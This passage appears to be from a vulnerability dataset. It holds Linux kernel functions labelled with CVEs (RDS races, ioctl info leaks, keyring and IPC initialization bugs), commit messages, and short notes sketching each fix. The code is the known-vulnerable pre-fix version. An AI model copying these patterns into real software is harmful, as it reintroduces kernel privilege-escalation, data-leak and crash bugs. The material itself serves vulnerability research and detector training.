}
rs->rs_conn = conn;
}
/* Parse any control messages the user may have included. */
ret = rds_cmsg_send(rs, rm, msg, &allocated_mr);
if (ret)
goto out;
if (rm->rdma.op_active && !conn->c_trans->xmit_rdma) {
printk_ratelimited(KERN_NOTICE "rdma_op %p conn xmit_rdma %p\n",
&rm->rdma, conn->c_trans->xmit_rdma);
ret = -EOPNOTSUPP;
goto out;
}
if (rm->atomic.op_active && !conn->c_trans->xmit_atomic) {
printk_ratelimited(KERN_NOTICE "atomic_op %p conn xmit_atomic %p\n",
&rm->atomic, conn->c_trans->xmit_atomic);
ret = -EOPNOTSUPP;
goto out;
}
rds_conn_connect_if_down(conn);
ret = rds_cong_wait(conn->c_fcong, dport, nonblock, rs);
if (ret) {
rs->rs_seen_congestion = 1;
goto out;
}
while (!rds_send_queue_rm(rs, conn, rm, rs->rs_bound_port,
dport, &queued)) {
rds_stats_inc(s_send_queue_full);
if (nonblock) {
ret = -EAGAIN;
goto out;
}
timeo = wait_event_interruptible_timeout(*sk_sleep(sk),
rds_send_queue_rm(rs, conn, rm,
rs->rs_bound_port,
dport,
&queued),
timeo);
rdsdebug("sendmsg woke queued %d timeo %ld\n", queued, timeo);
if (timeo > 0 || timeo == MAX_SCHEDULE_TIMEOUT)
continue;
ret = timeo;
if (ret == 0)
ret = -ETIMEDOUT;
goto out;
}
/*
* By now we've committed to the send. We reuse rds_send_worker()
* to retry sends in the rds thread if the transport asks us to.
*/
rds_stats_inc(s_send_queued);
ret = rds_send_xmit(conn);
if (ret == -ENOMEM || ret == -EAGAIN)
queue_delayed_work(rds_wq, &conn->c_send_w, 1);
rds_message_put(rm);
return payload_len;
out:
/* If the user included a RDMA_MAP cmsg, we allocated a MR on the fly.
* If the sendmsg goes through, we keep the MR. If it fails with EAGAIN
* or in any other way, we need to destroy the MR again */
if (allocated_mr)
rds_rdma_unuse(rs, rds_rdma_cookie_key(rm->m_rdma_cookie), 1);
if (rm)
rds_message_put(rm);
return ret;
}
| 63,125,872,970,388,840,000,000,000,000,000,000,000 | send.c | 261,842,697,984,098,440,000,000,000,000,000,000,000 | [
"CWE-362"
] | CVE-2015-7990 | Race condition in the rds_sendmsg function in net/rds/sendmsg.c in the Linux kernel before 4.3.3 allows local users to cause a denial of service (NULL pointer dereference and system crash) or possibly have unspecified other impact by using a socket that was not properly bound. NOTE: this vulnerability exists because of an incomplete fix for CVE-2015-6937. | https://nvd.nist.gov/vuln/detail/CVE-2015-7990 |
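The fix replaces the unlocked check (the "racing with another thread binding seems ok here" assumption above is exactly what breaks) with one taken under the socket lock, so rs_bound_addr cannot flip mid-check while rds_bind() runs. Sketch based on the commit message:

	lock_sock(sk);
	if (daddr == 0 || rs->rs_bound_addr == 0) {
		release_sock(sk);
		ret = -ENOTCONN;	/* XXX not a great errno */
		goto out;
	}
	release_sock(sk);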
1,434 | linux | 4b6184336ebb5c8dc1eae7f7ab46ee608a748b05 | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/4b6184336ebb5c8dc1eae7f7ab46ee608a748b05 | staging/dgnc: fix info leak in ioctl
The dgnc_mgmt_ioctl() code fails to initialize the 16 _reserved bytes of
struct digi_dinfo after the ->dinfo_nboards member. Add an explicit
memset(0) before filling the structure to avoid the info leak.
Signed-off-by: Salva Peiró <speirofr@gmail.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org> | 1 | long dgnc_mgmt_ioctl(struct file *file, unsigned int cmd, unsigned long arg)
{
unsigned long flags;
void __user *uarg = (void __user *)arg;
switch (cmd) {
case DIGI_GETDD:
{
/*
* This returns the total number of boards
* in the system, as well as driver version
* and has space for a reserved entry
*/
struct digi_dinfo ddi;
spin_lock_irqsave(&dgnc_global_lock, flags);
ddi.dinfo_nboards = dgnc_NumBoards;
sprintf(ddi.dinfo_version, "%s", DG_PART);
spin_unlock_irqrestore(&dgnc_global_lock, flags);
if (copy_to_user(uarg, &ddi, sizeof(ddi)))
return -EFAULT;
break;
}
case DIGI_GETBD:
{
int brd;
struct digi_info di;
if (copy_from_user(&brd, uarg, sizeof(int)))
return -EFAULT;
if (brd < 0 || brd >= dgnc_NumBoards)
return -ENODEV;
memset(&di, 0, sizeof(di));
di.info_bdnum = brd;
spin_lock_irqsave(&dgnc_Board[brd]->bd_lock, flags);
di.info_bdtype = dgnc_Board[brd]->dpatype;
di.info_bdstate = dgnc_Board[brd]->dpastatus;
di.info_ioport = 0;
di.info_physaddr = (ulong)dgnc_Board[brd]->membase;
di.info_physsize = (ulong)dgnc_Board[brd]->membase
- dgnc_Board[brd]->membase_end;
if (dgnc_Board[brd]->state != BOARD_FAILED)
di.info_nports = dgnc_Board[brd]->nasync;
else
di.info_nports = 0;
spin_unlock_irqrestore(&dgnc_Board[brd]->bd_lock, flags);
if (copy_to_user(uarg, &di, sizeof(di)))
return -EFAULT;
break;
}
case DIGI_GET_NI_INFO:
{
struct channel_t *ch;
struct ni_info ni;
unsigned char mstat = 0;
uint board = 0;
uint channel = 0;
if (copy_from_user(&ni, uarg, sizeof(ni)))
return -EFAULT;
board = ni.board;
channel = ni.channel;
/* Verify boundaries on board */
if (board >= dgnc_NumBoards)
return -ENODEV;
/* Verify boundaries on channel */
if (channel >= dgnc_Board[board]->nasync)
return -ENODEV;
ch = dgnc_Board[board]->channels[channel];
if (!ch || ch->magic != DGNC_CHANNEL_MAGIC)
return -ENODEV;
memset(&ni, 0, sizeof(ni));
ni.board = board;
ni.channel = channel;
spin_lock_irqsave(&ch->ch_lock, flags);
mstat = (ch->ch_mostat | ch->ch_mistat);
if (mstat & UART_MCR_DTR) {
ni.mstat |= TIOCM_DTR;
ni.dtr = TIOCM_DTR;
}
if (mstat & UART_MCR_RTS) {
ni.mstat |= TIOCM_RTS;
ni.rts = TIOCM_RTS;
}
if (mstat & UART_MSR_CTS) {
ni.mstat |= TIOCM_CTS;
ni.cts = TIOCM_CTS;
}
if (mstat & UART_MSR_RI) {
ni.mstat |= TIOCM_RI;
ni.ri = TIOCM_RI;
}
if (mstat & UART_MSR_DCD) {
ni.mstat |= TIOCM_CD;
ni.dcd = TIOCM_CD;
}
if (mstat & UART_MSR_DSR)
ni.mstat |= TIOCM_DSR;
ni.iflag = ch->ch_c_iflag;
ni.oflag = ch->ch_c_oflag;
ni.cflag = ch->ch_c_cflag;
ni.lflag = ch->ch_c_lflag;
if (ch->ch_digi.digi_flags & CTSPACE ||
ch->ch_c_cflag & CRTSCTS)
ni.hflow = 1;
else
ni.hflow = 0;
if ((ch->ch_flags & CH_STOPI) ||
(ch->ch_flags & CH_FORCED_STOPI))
ni.recv_stopped = 1;
else
ni.recv_stopped = 0;
if ((ch->ch_flags & CH_STOP) || (ch->ch_flags & CH_FORCED_STOP))
ni.xmit_stopped = 1;
else
ni.xmit_stopped = 0;
ni.curtx = ch->ch_txcount;
ni.currx = ch->ch_rxcount;
ni.baud = ch->ch_old_baud;
spin_unlock_irqrestore(&ch->ch_lock, flags);
if (copy_to_user(uarg, &ni, sizeof(ni)))
return -EFAULT;
break;
}
}
return 0;
}
| 193,364,450,923,515,900,000,000,000,000,000,000,000 | dgnc_mgmt.c | 195,319,938,365,409,150,000,000,000,000,000,000,000 | [
"CWE-200"
] | CVE-2015-7885 | The dgnc_mgmt_ioctl function in drivers/staging/dgnc/dgnc_mgmt.c in the Linux kernel through 4.3.3 does not initialize a certain structure member, which allows local users to obtain sensitive information from kernel memory via a crafted application. | https://nvd.nist.gov/vuln/detail/CVE-2015-7885 |
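The DIGI_GETDD branch is the leak: unlike DIGI_GETBD and DIGI_GET_NI_INFO it never zeroes its stack structure, so the _reserved bytes of struct digi_dinfo reach userspace. The fix adds the missing memset():

		struct digi_dinfo ddi;

		memset(&ddi, 0, sizeof(ddi));	/* zero the _reserved tail */

		spin_lock_irqsave(&dgnc_global_lock, flags);
		ddi.dinfo_nboards = dgnc_NumBoards;
		sprintf(ddi.dinfo_version, "%s", DG_PART);
		spin_unlock_irqrestore(&dgnc_global_lock, flags);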
1,435 | linux | eda98796aff0d9bf41094b06811f5def3b4c333c | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/eda98796aff0d9bf41094b06811f5def3b4c333c | [media] media/vivid-osd: fix info leak in ioctl
The vivid_fb_ioctl() code fails to initialize the 16 _reserved bytes of
struct fb_vblank after the ->hcount member. Add an explicit
memset(0) before filling the structure to avoid the info leak.
Signed-off-by: Salva Peiró <speirofr@gmail.com>
Signed-off-by: Hans Verkuil <hans.verkuil@cisco.com>
Signed-off-by: Mauro Carvalho Chehab <mchehab@osg.samsung.com> | 1 | static int vivid_fb_ioctl(struct fb_info *info, unsigned cmd, unsigned long arg)
{
struct vivid_dev *dev = (struct vivid_dev *)info->par;
switch (cmd) {
case FBIOGET_VBLANK: {
struct fb_vblank vblank;
vblank.flags = FB_VBLANK_HAVE_COUNT | FB_VBLANK_HAVE_VCOUNT |
FB_VBLANK_HAVE_VSYNC;
vblank.count = 0;
vblank.vcount = 0;
vblank.hcount = 0;
if (copy_to_user((void __user *)arg, &vblank, sizeof(vblank)))
return -EFAULT;
return 0;
}
default:
dprintk(dev, 1, "Unknown ioctl %08x\n", cmd);
return -EINVAL;
}
return 0;
}
| 326,103,382,253,395,940,000,000,000,000,000,000,000 | vivid-osd.c | 31,449,737,973,003,174,000,000,000,000,000,000,000 | [
"CWE-200"
] | CVE-2015-7884 | The vivid_fb_ioctl function in drivers/media/platform/vivid/vivid-osd.c in the Linux kernel through 4.3.3 does not initialize a certain structure member, which allows local users to obtain sensitive information from kernel memory via a crafted application. | https://nvd.nist.gov/vuln/detail/CVE-2015-7884 |
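Same pattern as the dgnc leak above: struct fb_vblank carries 16 _reserved bytes that the member-by-member assignments never touch. The fix memsets the structure first (which also makes the explicit count/vcount/hcount zeroing redundant):

		struct fb_vblank vblank;

		memset(&vblank, 0, sizeof(vblank));
		vblank.flags = FB_VBLANK_HAVE_COUNT | FB_VBLANK_HAVE_VCOUNT |
			       FB_VBLANK_HAVE_VSYNC;
		if (copy_to_user((void __user *)arg, &vblank, sizeof(vblank)))
			return -EFAULT;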
1,436 | linux | ce1fad2740c648a4340f6f6c391a8a83769d2e8c | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/ce1fad2740c648a4340f6f6c391a8a83769d2e8c | Merge branch 'keys-fixes' of git://git.kernel.org/pub/scm/linux/kernel/git/dhowells/linux-fs
Pull key handling fixes from David Howells:
"Here are two patches, the first of which at least should go upstream
immediately:
(1) Prevent a user-triggerable crash in the keyrings destructor when a
negatively instantiated keyring is garbage collected. I have also
seen this triggered for user type keys.
(2) Prevent the user from requesting that a keyring be created
and instantiated through an upcall. Doing so is probably safe
since the keyring type ignores the arguments to its instantiation
function - but we probably shouldn't let keyrings be created in
this manner"
* 'keys-fixes' of git://git.kernel.org/pub/scm/linux/kernel/git/dhowells/linux-fs:
KEYS: Don't permit request_key() to construct a new keyring
KEYS: Fix crash when attempt to garbage collect an uninstantiated keyring | 1 | static noinline void key_gc_unused_keys(struct list_head *keys)
{
while (!list_empty(keys)) {
struct key *key =
list_entry(keys->next, struct key, graveyard_link);
list_del(&key->graveyard_link);
kdebug("- %u", key->serial);
key_check(key);
/* Throw away the key data */
if (key->type->destroy)
key->type->destroy(key);
security_key_free(key);
/* deal with the user's key tracking and quota */
if (test_bit(KEY_FLAG_IN_QUOTA, &key->flags)) {
spin_lock(&key->user->lock);
key->user->qnkeys--;
key->user->qnbytes -= key->quotalen;
spin_unlock(&key->user->lock);
}
atomic_dec(&key->user->nkeys);
if (test_bit(KEY_FLAG_INSTANTIATED, &key->flags))
atomic_dec(&key->user->nikeys);
key_user_put(key->user);
kfree(key->description);
#ifdef KEY_DEBUGGING
key->magic = KEY_DEBUG_MAGIC_X;
#endif
kmem_cache_free(key_jar, key);
}
}
| 121,918,299,636,917,930,000,000,000,000,000,000,000 | gc.c | 241,205,744,750,980,900,000,000,000,000,000,000,000 | [
"CWE-20"
] | CVE-2015-7872 | The key_gc_unused_keys function in security/keys/gc.c in the Linux kernel through 4.2.6 allows local users to cause a denial of service (OOPS) via crafted keyctl commands. | https://nvd.nist.gov/vuln/detail/CVE-2015-7872 |
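The OOPS behind CVE-2015-7872 is key_gc_unused_keys() calling ->destroy() on a key that was never (or only negatively) instantiated, so the payload the destructor walks is garbage. The fix guards the destructor call; a sketch, with the predicate reconstructed from the commit message rather than quoted from the upstream diff:

	/* Throw away the key data, but only if there is any: an
	 * uninstantiated or negative key has no payload for
	 * ->destroy() to walk. */
	if (test_bit(KEY_FLAG_INSTANTIATED, &key->flags) &&
	    !test_bit(KEY_FLAG_NEGATIVE, &key->flags) &&
	    key->type->destroy)
		key->type->destroy(key);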
1,437 | linux | b9a532277938798b53178d5a66af6e2915cb27cf | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/b9a532277938798b53178d5a66af6e2915cb27cf | Initialize msg/shm IPC objects before doing ipc_addid()
As reported by Dmitry Vyukov, we really shouldn't do ipc_addid() before
having initialized the IPC object state. Yes, we initialize the IPC
object in a locked state, but with all the lockless RCU lookup work,
that IPC object lock no longer means that the state cannot be seen.
We already did this for the IPC semaphore code (see commit e8577d1f0329:
"ipc/sem.c: fully initialize sem_array before making it visible") but we
clearly forgot about msg and shm.
Reported-by: Dmitry Vyukov <dvyukov@google.com>
Cc: Manfred Spraul <manfred@colorfullife.com>
Cc: Davidlohr Bueso <dbueso@suse.de>
Cc: stable@vger.kernel.org
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org> | 1 | static int newque(struct ipc_namespace *ns, struct ipc_params *params)
{
struct msg_queue *msq;
int id, retval;
key_t key = params->key;
int msgflg = params->flg;
msq = ipc_rcu_alloc(sizeof(*msq));
if (!msq)
return -ENOMEM;
msq->q_perm.mode = msgflg & S_IRWXUGO;
msq->q_perm.key = key;
msq->q_perm.security = NULL;
retval = security_msg_queue_alloc(msq);
if (retval) {
ipc_rcu_putref(msq, ipc_rcu_free);
return retval;
}
/* ipc_addid() locks msq upon success. */
id = ipc_addid(&msg_ids(ns), &msq->q_perm, ns->msg_ctlmni);
if (id < 0) {
ipc_rcu_putref(msq, msg_rcu_free);
return id;
}
msq->q_stime = msq->q_rtime = 0;
msq->q_ctime = get_seconds();
msq->q_cbytes = msq->q_qnum = 0;
msq->q_qbytes = ns->msg_ctlmnb;
msq->q_lspid = msq->q_lrpid = 0;
INIT_LIST_HEAD(&msq->q_messages);
INIT_LIST_HEAD(&msq->q_receivers);
INIT_LIST_HEAD(&msq->q_senders);
ipc_unlock_object(&msq->q_perm);
rcu_read_unlock();
return msq->q_perm.id;
}
| 145,137,506,070,763,420,000,000,000,000,000,000,000 | msg.c | 137,063,545,741,306,320,000,000,000,000,000,000,000 | [
"CWE-362"
] | CVE-2015-7613 | Race condition in the IPC object implementation in the Linux kernel through 4.2.3 allows local users to gain privileges by triggering an ipc_addid call that leads to uid and gid comparisons against uninitialized data, related to msg.c, shm.c, and util.c. | https://nvd.nist.gov/vuln/detail/CVE-2015-7613 |
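The fix is purely a reordering: fully initialize the msg_queue before ipc_addid() publishes it, since lockless RCU lookups can observe the object the moment it enters the idr. Sketch of the reordered tail of newque(), same statements as above moved ahead of the publication point:

	msq->q_stime = msq->q_rtime = 0;
	msq->q_ctime = get_seconds();
	msq->q_cbytes = msq->q_qnum = 0;
	msq->q_qbytes = ns->msg_ctlmnb;
	msq->q_lspid = msq->q_lrpid = 0;
	INIT_LIST_HEAD(&msq->q_messages);
	INIT_LIST_HEAD(&msq->q_receivers);
	INIT_LIST_HEAD(&msq->q_senders);

	/* Only now make the object findable. ipc_addid() locks msq on success. */
	id = ipc_addid(&msg_ids(ns), &msq->q_perm, ns->msg_ctlmni);
	if (id < 0) {
		ipc_rcu_putref(msq, msg_rcu_free);
		return id;
	}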
1,438 | linux | b9a532277938798b53178d5a66af6e2915cb27cf | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/b9a532277938798b53178d5a66af6e2915cb27cf | Initialize msg/shm IPC objects before doing ipc_addid()
As reported by Dmitry Vyukov, we really shouldn't do ipc_addid() before
having initialized the IPC object state. Yes, we initialize the IPC
object in a locked state, but with all the lockless RCU lookup work,
that IPC object lock no longer means that the state cannot be seen.
We already did this for the IPC semaphore code (see commit e8577d1f0329:
"ipc/sem.c: fully initialize sem_array before making it visible") but we
clearly forgot about msg and shm.
Reported-by: Dmitry Vyukov <dvyukov@google.com>
Cc: Manfred Spraul <manfred@colorfullife.com>
Cc: Davidlohr Bueso <dbueso@suse.de>
Cc: stable@vger.kernel.org
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org> | 1 | static int newseg(struct ipc_namespace *ns, struct ipc_params *params)
{
key_t key = params->key;
int shmflg = params->flg;
size_t size = params->u.size;
int error;
struct shmid_kernel *shp;
size_t numpages = (size + PAGE_SIZE - 1) >> PAGE_SHIFT;
struct file *file;
char name[13];
int id;
vm_flags_t acctflag = 0;
if (size < SHMMIN || size > ns->shm_ctlmax)
return -EINVAL;
if (numpages << PAGE_SHIFT < size)
return -ENOSPC;
if (ns->shm_tot + numpages < ns->shm_tot ||
ns->shm_tot + numpages > ns->shm_ctlall)
return -ENOSPC;
shp = ipc_rcu_alloc(sizeof(*shp));
if (!shp)
return -ENOMEM;
shp->shm_perm.key = key;
shp->shm_perm.mode = (shmflg & S_IRWXUGO);
shp->mlock_user = NULL;
shp->shm_perm.security = NULL;
error = security_shm_alloc(shp);
if (error) {
ipc_rcu_putref(shp, ipc_rcu_free);
return error;
}
sprintf(name, "SYSV%08x", key);
if (shmflg & SHM_HUGETLB) {
struct hstate *hs;
size_t hugesize;
hs = hstate_sizelog((shmflg >> SHM_HUGE_SHIFT) & SHM_HUGE_MASK);
if (!hs) {
error = -EINVAL;
goto no_file;
}
hugesize = ALIGN(size, huge_page_size(hs));
/* hugetlb_file_setup applies strict accounting */
if (shmflg & SHM_NORESERVE)
acctflag = VM_NORESERVE;
file = hugetlb_file_setup(name, hugesize, acctflag,
&shp->mlock_user, HUGETLB_SHMFS_INODE,
(shmflg >> SHM_HUGE_SHIFT) & SHM_HUGE_MASK);
} else {
/*
* Do not allow no accounting for OVERCOMMIT_NEVER, even
* if it's asked for.
*/
if ((shmflg & SHM_NORESERVE) &&
sysctl_overcommit_memory != OVERCOMMIT_NEVER)
acctflag = VM_NORESERVE;
file = shmem_kernel_file_setup(name, size, acctflag);
}
error = PTR_ERR(file);
if (IS_ERR(file))
goto no_file;
id = ipc_addid(&shm_ids(ns), &shp->shm_perm, ns->shm_ctlmni);
if (id < 0) {
error = id;
goto no_id;
}
shp->shm_cprid = task_tgid_vnr(current);
shp->shm_lprid = 0;
shp->shm_atim = shp->shm_dtim = 0;
shp->shm_ctim = get_seconds();
shp->shm_segsz = size;
shp->shm_nattch = 0;
shp->shm_file = file;
shp->shm_creator = current;
list_add(&shp->shm_clist, &current->sysvshm.shm_clist);
/*
* shmid gets reported as "inode#" in /proc/pid/maps.
* proc-ps tools use this. Changing this will break them.
*/
file_inode(file)->i_ino = shp->shm_perm.id;
ns->shm_tot += numpages;
error = shp->shm_perm.id;
ipc_unlock_object(&shp->shm_perm);
rcu_read_unlock();
return error;
no_id:
if (is_file_hugepages(file) && shp->mlock_user)
user_shm_unlock(size, shp->mlock_user);
fput(file);
no_file:
ipc_rcu_putref(shp, shm_rcu_free);
return error;
}
| 280,625,932,635,716,960,000,000,000,000,000,000,000 | shm.c | 203,233,666,096,037,030,000,000,000,000,000,000,000 | [
"CWE-362"
] | CVE-2015-7613 | Race condition in the IPC object implementation in the Linux kernel through 4.2.3 allows local users to gain privileges by triggering an ipc_addid call that leads to uid and gid comparisons against uninitialized data, related to msg.c, shm.c, and util.c. | https://nvd.nist.gov/vuln/detail/CVE-2015-7613 |
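newseg() gets the same treatment: the shp fields move ahead of ipc_addid(). In my reading of the patch the shm_clist insertion stays after publication, since it is protected by the task rather than by the IPC object lock. Sketch:

	shp->shm_cprid = task_tgid_vnr(current);
	shp->shm_lprid = 0;
	shp->shm_atim = shp->shm_dtim = 0;
	shp->shm_ctim = get_seconds();
	shp->shm_segsz = size;
	shp->shm_nattch = 0;
	shp->shm_file = file;
	shp->shm_creator = current;

	id = ipc_addid(&shm_ids(ns), &shp->shm_perm, ns->shm_ctlmni);
	if (id < 0) {
		error = id;
		goto no_id;
	}

	list_add(&shp->shm_clist, &current->sysvshm.shm_clist);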
1,439 | linux | b9a532277938798b53178d5a66af6e2915cb27cf | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/b9a532277938798b53178d5a66af6e2915cb27cf | Initialize msg/shm IPC objects before doing ipc_addid()
As reported by Dmitry Vyukov, we really shouldn't do ipc_addid() before
having initialized the IPC object state. Yes, we initialize the IPC
object in a locked state, but with all the lockless RCU lookup work,
that IPC object lock no longer means that the state cannot be seen.
We already did this for the IPC semaphore code (see commit e8577d1f0329:
"ipc/sem.c: fully initialize sem_array before making it visible") but we
clearly forgot about msg and shm.
Reported-by: Dmitry Vyukov <dvyukov@google.com>
Cc: Manfred Spraul <manfred@colorfullife.com>
Cc: Davidlohr Bueso <dbueso@suse.de>
Cc: stable@vger.kernel.org
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org> | 1 | int ipc_addid(struct ipc_ids *ids, struct kern_ipc_perm *new, int size)
{
kuid_t euid;
kgid_t egid;
int id;
int next_id = ids->next_id;
if (size > IPCMNI)
size = IPCMNI;
if (ids->in_use >= size)
return -ENOSPC;
idr_preload(GFP_KERNEL);
spin_lock_init(&new->lock);
new->deleted = false;
rcu_read_lock();
spin_lock(&new->lock);
id = idr_alloc(&ids->ipcs_idr, new,
(next_id < 0) ? 0 : ipcid_to_idx(next_id), 0,
GFP_NOWAIT);
idr_preload_end();
if (id < 0) {
spin_unlock(&new->lock);
rcu_read_unlock();
return id;
}
ids->in_use++;
current_euid_egid(&euid, &egid);
new->cuid = new->uid = euid;
new->gid = new->cgid = egid;
if (next_id < 0) {
new->seq = ids->seq++;
if (ids->seq > IPCID_SEQ_MAX)
ids->seq = 0;
} else {
new->seq = ipcid_to_seqx(next_id);
ids->next_id = -1;
}
new->id = ipc_buildid(id, new->seq);
return id;
}
| 260,213,467,137,768,860,000,000,000,000,000,000,000 | util.c | 249,665,259,441,201,800,000,000,000,000,000,000,000 | [
"CWE-362"
] | CVE-2015-7613 | Race condition in the IPC object implementation in the Linux kernel through 4.2.3 allows local users to gain privileges by triggering an ipc_addid call that leads to uid and gid comparisons against uninitialized data, related to msg.c, shm.c, and util.c. | https://nvd.nist.gov/vuln/detail/CVE-2015-7613 |
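ipc_addid() itself is the third leg of the same fix: the uid/gid fields that permission checks compare against must be assigned before idr_alloc() inserts the object, because that insertion is the publication point for RCU readers. Sketch of the reordering, with the surrounding code assumed to be as above:

	idr_preload(GFP_KERNEL);

	spin_lock_init(&new->lock);
	new->deleted = false;
	rcu_read_lock();
	spin_lock(&new->lock);

	/* Credentials first: a concurrent lookup may run permission
	 * checks on this object the instant idr_alloc() succeeds. */
	current_euid_egid(&euid, &egid);
	new->cuid = new->uid = euid;
	new->gid = new->cgid = egid;

	id = idr_alloc(&ids->ipcs_idr, new,
		       (next_id < 0) ? 0 : ipcid_to_idx(next_id), 0,
		       GFP_NOWAIT);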
1,441 | linux | 74e98eb085889b0d2d4908f59f6e00026063014f | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/74e98eb085889b0d2d4908f59f6e00026063014f | RDS: verify the underlying transport exists before creating a connection
There was no verification that an underlying transport exists when creating
a connection, which would lead to a NULL pointer dereference.
It might happen on sockets that weren't properly bound before attempting to
send a message, which will cause a NULL ptr deref:
[135546.047719] kasan: GPF could be caused by NULL-ptr deref or user memory access
general protection fault: 0000 [#1] PREEMPT SMP DEBUG_PAGEALLOC KASAN
[135546.051270] Modules linked in:
[135546.051781] CPU: 4 PID: 15650 Comm: trinity-c4 Not tainted 4.2.0-next-20150902-sasha-00041-gbaa1222-dirty #2527
[135546.053217] task: ffff8800835bc000 ti: ffff8800bc708000 task.ti: ffff8800bc708000
[135546.054291] RIP: __rds_conn_create (net/rds/connection.c:194)
[135546.055666] RSP: 0018:ffff8800bc70fab0 EFLAGS: 00010202
[135546.056457] RAX: dffffc0000000000 RBX: 0000000000000f2c RCX: ffff8800835bc000
[135546.057494] RDX: 0000000000000007 RSI: ffff8800835bccd8 RDI: 0000000000000038
[135546.058530] RBP: ffff8800bc70fb18 R08: 0000000000000001 R09: 0000000000000000
[135546.059556] R10: ffffed014d7a3a23 R11: ffffed014d7a3a21 R12: 0000000000000000
[135546.060614] R13: 0000000000000001 R14: ffff8801ec3d0000 R15: 0000000000000000
[135546.061668] FS: 00007faad4ffb700(0000) GS:ffff880252000000(0000) knlGS:0000000000000000
[135546.062836] CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b
[135546.063682] CR2: 000000000000846a CR3: 000000009d137000 CR4: 00000000000006a0
[135546.064723] Stack:
[135546.065048] ffffffffafe2055c ffffffffafe23fc1 ffffed00493097bf ffff8801ec3d0008
[135546.066247] 0000000000000000 00000000000000d0 0000000000000000 ac194a24c0586342
[135546.067438] 1ffff100178e1f78 ffff880320581b00 ffff8800bc70fdd0 ffff880320581b00
[135546.068629] Call Trace:
[135546.069028] ? __rds_conn_create (include/linux/rcupdate.h:856 net/rds/connection.c:134)
[135546.069989] ? rds_message_copy_from_user (net/rds/message.c:298)
[135546.071021] rds_conn_create_outgoing (net/rds/connection.c:278)
[135546.071981] rds_sendmsg (net/rds/send.c:1058)
[135546.072858] ? perf_trace_lock (include/trace/events/lock.h:38)
[135546.073744] ? lockdep_init (kernel/locking/lockdep.c:3298)
[135546.074577] ? rds_send_drop_to (net/rds/send.c:976)
[135546.075508] ? __might_fault (./arch/x86/include/asm/current.h:14 mm/memory.c:3795)
[135546.076349] ? __might_fault (mm/memory.c:3795)
[135546.077179] ? rds_send_drop_to (net/rds/send.c:976)
[135546.078114] sock_sendmsg (net/socket.c:611 net/socket.c:620)
[135546.078856] SYSC_sendto (net/socket.c:1657)
[135546.079596] ? SYSC_connect (net/socket.c:1628)
[135546.080510] ? trace_dump_stack (kernel/trace/trace.c:1926)
[135546.081397] ? ring_buffer_unlock_commit (kernel/trace/ring_buffer.c:2479 kernel/trace/ring_buffer.c:2558 kernel/trace/ring_buffer.c:2674)
[135546.082390] ? trace_buffer_unlock_commit (kernel/trace/trace.c:1749)
[135546.083410] ? trace_event_raw_event_sys_enter (include/trace/events/syscalls.h:16)
[135546.084481] ? do_audit_syscall_entry (include/trace/events/syscalls.h:16)
[135546.085438] ? trace_buffer_unlock_commit (kernel/trace/trace.c:1749)
[135546.085515] rds_ib_laddr_check(): addr 36.74.25.172 ret -99 node type -1
Acked-by: Santosh Shilimkar <santosh.shilimkar@oracle.com>
Signed-off-by: Sasha Levin <sasha.levin@oracle.com>
Signed-off-by: David S. Miller <davem@davemloft.net> | 1 | static struct rds_connection *__rds_conn_create(struct net *net,
__be32 laddr, __be32 faddr,
struct rds_transport *trans, gfp_t gfp,
int is_outgoing)
{
struct rds_connection *conn, *parent = NULL;
struct hlist_head *head = rds_conn_bucket(laddr, faddr);
struct rds_transport *loop_trans;
unsigned long flags;
int ret;
struct rds_transport *otrans = trans;
if (!is_outgoing && otrans->t_type == RDS_TRANS_TCP)
goto new_conn;
rcu_read_lock();
conn = rds_conn_lookup(net, head, laddr, faddr, trans);
if (conn && conn->c_loopback && conn->c_trans != &rds_loop_transport &&
laddr == faddr && !is_outgoing) {
/* This is a looped back IB connection, and we're
* called by the code handling the incoming connect.
* We need a second connection object into which we
* can stick the other QP. */
parent = conn;
conn = parent->c_passive;
}
rcu_read_unlock();
if (conn)
goto out;
new_conn:
conn = kmem_cache_zalloc(rds_conn_slab, gfp);
if (!conn) {
conn = ERR_PTR(-ENOMEM);
goto out;
}
INIT_HLIST_NODE(&conn->c_hash_node);
conn->c_laddr = laddr;
conn->c_faddr = faddr;
spin_lock_init(&conn->c_lock);
conn->c_next_tx_seq = 1;
rds_conn_net_set(conn, net);
init_waitqueue_head(&conn->c_waitq);
INIT_LIST_HEAD(&conn->c_send_queue);
INIT_LIST_HEAD(&conn->c_retrans);
ret = rds_cong_get_maps(conn);
if (ret) {
kmem_cache_free(rds_conn_slab, conn);
conn = ERR_PTR(ret);
goto out;
}
/*
* This is where a connection becomes loopback. If *any* RDS sockets
* can bind to the destination address then we'd rather the messages
* flow through loopback rather than either transport.
*/
loop_trans = rds_trans_get_preferred(net, faddr);
if (loop_trans) {
rds_trans_put(loop_trans);
conn->c_loopback = 1;
if (is_outgoing && trans->t_prefer_loopback) {
/* "outgoing" connection - and the transport
* says it wants the connection handled by the
* loopback transport. This is what TCP does.
*/
trans = &rds_loop_transport;
}
}
conn->c_trans = trans;
ret = trans->conn_alloc(conn, gfp);
if (ret) {
kmem_cache_free(rds_conn_slab, conn);
conn = ERR_PTR(ret);
goto out;
}
atomic_set(&conn->c_state, RDS_CONN_DOWN);
conn->c_send_gen = 0;
conn->c_reconnect_jiffies = 0;
INIT_DELAYED_WORK(&conn->c_send_w, rds_send_worker);
INIT_DELAYED_WORK(&conn->c_recv_w, rds_recv_worker);
INIT_DELAYED_WORK(&conn->c_conn_w, rds_connect_worker);
INIT_WORK(&conn->c_down_w, rds_shutdown_worker);
mutex_init(&conn->c_cm_lock);
conn->c_flags = 0;
rdsdebug("allocated conn %p for %pI4 -> %pI4 over %s %s\n",
conn, &laddr, &faddr,
trans->t_name ? trans->t_name : "[unknown]",
is_outgoing ? "(outgoing)" : "");
/*
* Since we ran without holding the conn lock, someone could
* have created the same conn (either normal or passive) in the
* interim. We check while holding the lock. If we won, we complete
* init and return our conn. If we lost, we rollback and return the
* other one.
*/
spin_lock_irqsave(&rds_conn_lock, flags);
